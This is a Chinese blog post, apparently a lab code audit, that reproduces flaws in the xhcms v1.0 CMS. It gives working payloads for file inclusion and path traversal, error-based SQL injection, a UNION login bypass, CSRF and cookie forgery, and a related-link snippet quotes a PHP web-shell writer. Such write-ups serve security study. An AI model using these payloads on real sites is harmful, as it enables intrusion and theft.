xhcms v1.0漏洞复现

已于 2024-09-13 15:10:00 修改
阅读量1.2k 收藏 10
点赞数 15
文章标签: 网络安全
于 2024-09-03 17:02:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44087538/article/details/141866539
版权

一、文件包含

Ex. 1

文件包含函数中存在变量,可能存在文件包含漏洞 /index.php include('files/'.$action.'.php'); //载入相应文件

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

这里直接将GET接收到的r参数,使用addslashes()转义,然后赋值给$action,但没有对$action进行充分的验证。因为GET传进来的r参数是可控的,攻击者可以通过修改URL中的'r'参数来包含任意文件,导致文件包含漏洞。

后面拼接了.php,所以要想办法将他去掉。这里可以使用00截断、.号溢出、?方式进行截断,不过都有php版本限制。

在项目根目录下放一个文件1.txt,内容为<?php phpinfo();?>

.号溢出
Windows的文件名字最后面加.是不影响文件的,Windows文件名的最大长度是260个字节,后面超出部分被丢弃。
需要满足条件:php版本=5.2.17、Virtual Directory Support=enable
payload:
?r=../1.txt........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
00截断的原理:在PHP版本低于5.3.4时,如果文件名或URL参数中包含空字符(ASCII码为0的字符,即chr(0)),这个空字符会导致其后面的所有字符被忽略或丢弃。这通常用于绕过文件名扩展名的检查,使得攻击者能够上传或执行非法文件。
​
00截断利用条件 //此处由于addslashes()函数导致不可用
1、magic_quotes_gpc =off
2、php版本小于5.3.4
payload:
?r=../1.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

也可以使用…/来实现路径穿越,但后缀只能是.php

本来是包含files文件夹下的php文件,通过目录穿越我们尝试包含创建的phpinfo.php文件

image-20240902203508811

http://127.0.0.1/xhcms/?r=../phpinfo

image-20240902203935214

Ex. 2

文件包含函数中存在变量,可能存在文件包含漏洞 /admin/index.php include('files/'.$action.'.php'); //载入相应文件

原理同上

http://127.0.0.1/xhcms/admin/?r=../../phpinfo

二、SQL注入

Ex. 1

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/adset.php $query = "UPDATE adword SET ad1='$ad1',

$save=$_POST['save'];
$ad1=addslashes($_POST['ad1']);
$ad2=addslashes($_POST['ad2']);
$ad3=addslashes($_POST['ad3']);
if ($save==1){
$query = "UPDATE adword SET 
ad1='$ad1',
ad2='$ad2',
ad3='$ad3',
date=now()";

此处对于POST方式输入的参数使用了addslashes函数进行了过滤,所以这里的注入是一个误报

`addslashes`函数在PHP中用于在字符串中的特定字符前添加反斜杠(\),这些特定字符通常包括单引号(')、双引号(")、反斜杠(\)以及NULL字符,从而改变了它们在SQL语句中的原有意义,使得它们不再被视为SQL代码的一部分,而是被当作普通的文本字符处理,即“转义”。

Ex. 2

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/editcolumn.php $query = "UPDATE navclass SET name='$name',

$name=$_POST['name'];
...
$query = "UPDATE nav SET name='$name',..."

POST方法接收name参数,但是没有进行过滤

访问路径http://127.0.0.1/xhcms/admin/?r=editcolumn&type=1&id=1

名称输入框内输入单引号提交后报错,说明存在sql注入

image-20240903091822945

抓包,替换name参数如下

1' and (extractvalue(1,concat(0x7e,(select USER()),0x7e))) and'

前提:取决于数据库的错误处理配置,即是否允许在错误消息中返回查询的一部分结果,现在这种配置多被禁用
​
extractvalue():这是MySQL中用于从XML文档中提取值的函数。
语法:EXTRACTVALUE(xml_frag, xpath_expr),其中xml_frag是包含XML数据的字符串,xpath_expr是用于从该数据中提取数据的XPath表达式。
​
显然,1作为xml_frag的输入是不合法的,因为1不是一个有效的XML文档。这正是SQL注入者试图利用的地方,因为非法的xml_frag值会导致数据库返回一个错误。

image-20240903094301833

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞/admin/files/editcolumn.php$query = "UPDATE nav SET name='$name',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/editlink.php $query = "UPDATE link SET name='$name',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/editwz.php $query = "UPDATE content SET navclass='$navclass',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/imageset.php $query = "UPDATE imageset SET img_kg='$img_kg',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/manageinfo.php $query = "UPDATE manage SET user='$user',

SQL语句insert中插入变量无单引号保护,可能存在SQL注入漏洞 /admin/files/newlink.php $query = "INSERT INTO link (name,url,mail,jieshao,xs,date) VALUES ('$name','$url','$mail','jieshao','xs',now())";

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/reply.php $query = "UPDATE interaction SET xs='$xs',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/seniorset.php $query = "UPDATE seniorset SET lysh='$lysh',

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /admin/files/siteset.php $query = "UPDATE settings SET name='$name',

这些都是/admin目录下的,即后台系统的,需要登录才有权限访问

基本类似,不再赘述

Ex. 3

注意路径中没有/admin,是前台

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /files/content.php $query = "UPDATE content SET hit = hit+1 WHERE id=$id";

$id=addslashes($_GET['cid']);
$query = "SELECT * FROM content WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$content = mysql_fetch_array($resul);
...
$query = "UPDATE content SET hit = hit+1 WHERE id=$id";

代码分析:

  • get型接收一个cid参数,使用addslashes进行转义;

  • id拼接到查询语句中,使用mysql_query()执行语句,当语句执行失败,则抛出die()中的内容以及错误。

    既然输出报错信息了,还存在注入,那这里肯定要尝试报错注入了。

http://127.0.0.1/xhcms/?r=software&cid=1

加一个单引号后会报错

构造payload:1 and (extractvalue(1,concat(0x7e,(select USER()),0x7e)))

image-20240903104104044

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /files/downloads.php $query = "UPDATE download SET xiazai = xiazai+1 WhERE id='$fileid'";

SQL语句delete中条件变量无单引号保护,可能存在SQL注入漏洞 /files/software.php $query = "UPDATE download SET hit = hit+1 WHERE id=$id";

基本类似,不再赘述

三、XSS

EX. 1 反射型

/files/contact.php文件下,有一个page变量,在html中直接输出,没有进行过滤

image-20240903112224963

image-20240903112434741

image-20240903112812144

EX. 2 存储型

/admin/files/adset.php

$ad1=addslashes($_POST['ad1']);
$ad2=addslashes($_POST['ad2']);
$ad3=addslashes($_POST['ad3']);
if ($save==1){
$query = "UPDATE adword SET 
ad1='$ad1',
ad2='$ad2',
ad3='$ad3',

UPDATE将前端的数据写入到adword表中,这个地方在写入的时候没有进行过滤,如果在前端页面调用我们写入的值,就有可能存在XSS

全局搜索adword,点击打开files/content.php

image-20240903111042856

直接将查询结果输出到页面,存在存储型XSS

登录进后台----设置----广告设置,三个广告都可以

image-20240903111242094

路径http://127.0.0.1/xhcms/?r=content&cid=5访问到/files/content.php即可触发/files/software.php/template/sidebar.php同理

四、任意用户登录

/admin/files/login.php

直接拼接了user变量,并且user变量也没有进行过滤,存在sql注入漏洞

image-20240903154514226

解释:上述代码中user和password参数是分开验证的,首先通过user查询数据库以获取用户记录,然后再在服务器端将存储的d密码哈希与输入的password密码(经过MD5哈希后)进行比较。user参数不存在过滤,所以user处是存在注入的;而password处则是对目前登录用户的密码的md5值进行验证。

登陆页面分别输入:

  • 账号:-1' union select 1,2,'test','0192023a7bbd73250516f069df18b500',5,6,7,8;#

  • 密码:admin123

此处md5(admin123)=0192023a7bbd73250516f069df18b500

image-20240903160422418

五、CSRF

CSRF重点关注诸如删除、修改、增加之类的危险功能,通过判断其是否存在适当的token或其他校验机制来评估CSRF防护的到位程度

内容管理—>文章管理,点击删除文章并抓包

使用burpsuite自带的CSRF PoC generator生成

image-20240903143647490

在本地创建CSRF.html,运行访问

image-20240903143844550

看到页面出现了按钮,抓包的时候我们可以看到没有token验证,证明很有可能存在CSRF漏洞,这个时候浏览器还保存着管理员的身份信息,所以点击Submit就能够删除对应的文章

image-20240903144140946

六、未授权及越权

/inc/chexclogin.php

<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;   
}
?>

检测是否是登录的状态,仅仅是通过验证cookie中的user参数是否存在,不存在就直接跳转登录页面

正常登录admin用户他的cookie如下:

Cookie: Hm_lvt_82526ffa6fe7df3f398d10ed7f985ccb=1722501603; user=admin

可以看到user=admin,根据checklongin.php的验证逻辑,只要每次访问后台带上user=admin即可越权成为管理员

所以在cookie处添加user参数携带admin等非空值即可绕过登陆界面访问控制台

image-20240903165750953

六分之杰
关注
xhcms_v.1.0的审计
qq_62536279的博客
11-20 707
新手入门审计,持续更新
文件下载漏洞案例-xhcms
c0529的博客
05-12 482
这个漏洞严格意义上利用的条件比较苛刻,但是我们还是可以借着这个漏洞学习一下文件下载漏洞的特点。
复现】常见CMS漏洞
最新发布
m0_59151303的博客
08-04 833
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
【代码审计】xhcms_v1.0
Vicl1fe的博客
02-22 1309
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 环境: cms下载地址:http://down.chinaz.com/soft/39154.htm phpstudy php 5.5.45 mysql 5.5.53 想学学代码审计。拿个小众点的来看看吧。 sql注入 安装步骤不说了,安装好后如下图。 看到这个站点就想随便点一点。,然后看看url的参数。 ...
熊海博客php版本,xhcms_v1.0 熊海CMS是由熊海开发的一款可广泛应用于个人博客 联合开发网 - pudn.com...
weixin_30126739的博客
04-02 262
xhcms_v1.0所属分类:WEB开发开发工具:Java文件大小:4002KB下载次数:3上传日期:2015-05-14 14:41:13上 传 者:dou说明:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告...
php熊海博客,xhcms_v1.0 熊海CMS是由 开发的一款可广泛应 个人博客, 网站,企业 套 综合 WEB(ASP,PHP,...) 238万源代码下载- www.pudn.com...
weixin_42280315的博客
03-17 865
文件名称: xhcms_v1.0下载 收藏√ [5 4 3 2 1]开发工具: Java文件大小: 4002 KB上传时间: 2015-05-14下载次数: 0提 供 者:详细说明:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目...
94xhcms v1.3
04-01
94xhcms v1.3 是一个基于ASP技术构建的内容管理系统(CMS),它以其小巧而精致的特点在开发者中受到关注。CMS系统是用于管理网站内容的软件平台,允许用户无需深入了解HTML或编程语言即可创建、编辑和发布内容。94...
小邓CMS v1.0.rar
08-30
1 代码完全免费公开,而且BUG很多,因为是V1.0版,建议不要直接用到项目中。 2 代码完全开源提供新手学**CMS用。思路明确,内容简单。 3 用到了RBAC认证,但没有完全照着thinkphp提供的方式实现。 这个PHP开源...
易辰企业建站cms v1.0.rar
07-08
易辰企业建站cms采用.NET ACCESS开发,系统简单,功能完善。 开发环境:Vs2010_access(.net2.0) 后台地址:super/login.aspx 账号和密码分别是: admin yq761
94xhcms v1.3-ASP源码.zip
12-14
【94xhcms v1.3 ASP源码】是一个基于ASP(Active Server Pages)技术构建的网站内容管理系统。ASP是一种由微软开发的服务器端脚本环境,它允许开发者在服务器上编写动态网页并处理用户请求。94xhcms是这类系统的一个...
94xhcms v1.3.rar
07-05
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 无限级分类,建立门户网站也轻而易举 模块化采集,一键实现远程文档本地化 集成自定义表单,满足各种交互应用 自定义可视化标签,模板风格随时更换 更多功能请下载体验... 安装方法:解压后直接运行install (如:127.0.0.1/install)进行安装。 切记,安装完毕后请手动删除 install 文件夹及其下所有文件。
任意文件包含漏洞(3)——实战xhcms
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-23 3913
又是一个有漏洞cms 编码了 127.0.0.1/xhcms/?r=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>’);?> 抓包改
xhcms-v1.0 代码审计
Aukum的博客
05-05 1277
熊海CMS代码审计,xss,sql,越权,文件包含,任意文件读取
熊海博客php版本,熊海CMS xhcms v1.0代码审计
weixin_39731922的博客
04-02 488
有空的时候就进行小型CMS的代码审计,这次审计的对象是熊海CMS v1.0本地环境安装好了之后,可以看到提示安装了锁文件说明重装漏洞应该不会存在了,这时候丢进seay代码审计系统的代码也出结果了,挨个看看//单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET[‘r‘]); //接收文件名$action=$file==‘‘?‘index‘...
XHcms
Yu3511606536的博客
06-22 905
代码审计:XHcms
新手首次php代码审计--熊海cmsV1.0
weixin_67289581的博客
04-12 1352
首次代审--熊海cmsV1.0附源码下载链接将源码导入seay系统,并开始审计首次代审--熊海cmsV1.0附源码下载链接将源码导入seay系统,并开始审计。
熊海cms_v1.0代码审计
RestoreJustice的博客
03-23 799
取出密码与POST提交的密码进行比较验证),且将admin123用户的md5值(这里是1的md5)带进去给password参数进行验证,即可绕过控制台登录界面。将cid参数值写成XSS语句,SQL语句执行错误,将xss语句一并输出显示在页面,造成反射型XSS。使用phpstudy环境搭建,php版本要小于7(我这里使用php5.4),之后要自己新建一个数据库用于安转cms(cms不能自动新建数据库)号来表示不同的留言,对那条留言编辑要提交对应的id。后台注入挺多的,大多是未过滤造成的,这里不一一列举了。
django xadmin 默认密码_Django重置密码漏洞(CVE201919844)复现和分析
weixin_39611161的博客
11-24 1858
前言CVE-2019-19844是Django重置密码功能的一个漏洞。Django的密码重置表单使用不区分大小写的查询来获取输入的邮箱地址对应的账号。一个知道邮箱地址和账号对应关系的攻击者可以精心构造一个和该账号邮箱地址不同,但经过Unicode大小写转换后相同的邮箱地址,来接收该账户的密码重置邮件,从而实现账户劫持的攻击目标。本文较为详细地记录了该漏洞复现过程,简要分析了漏洞成因,讨...
xhcms csrf漏洞
09-03
抱歉,我没有找到关于xhcms的csrf漏洞的引用内容。可能是因为这个漏洞没有被广泛报道或者没有相关的公开资料。如果您对xhcms的csrf漏洞感兴趣,我建议您参考安全专家、漏洞研究人员或安全社区的讨论和报告,以获取更多关于该漏洞的信息。同时,我也建议您在使用xhcms或其他网站建设框架时,注意及时更新和修补漏洞,以保护自己的网站安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【网络安全xhCMS代码审计思路](https://blog.csdn.net/HBohan/article/details/121098795)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值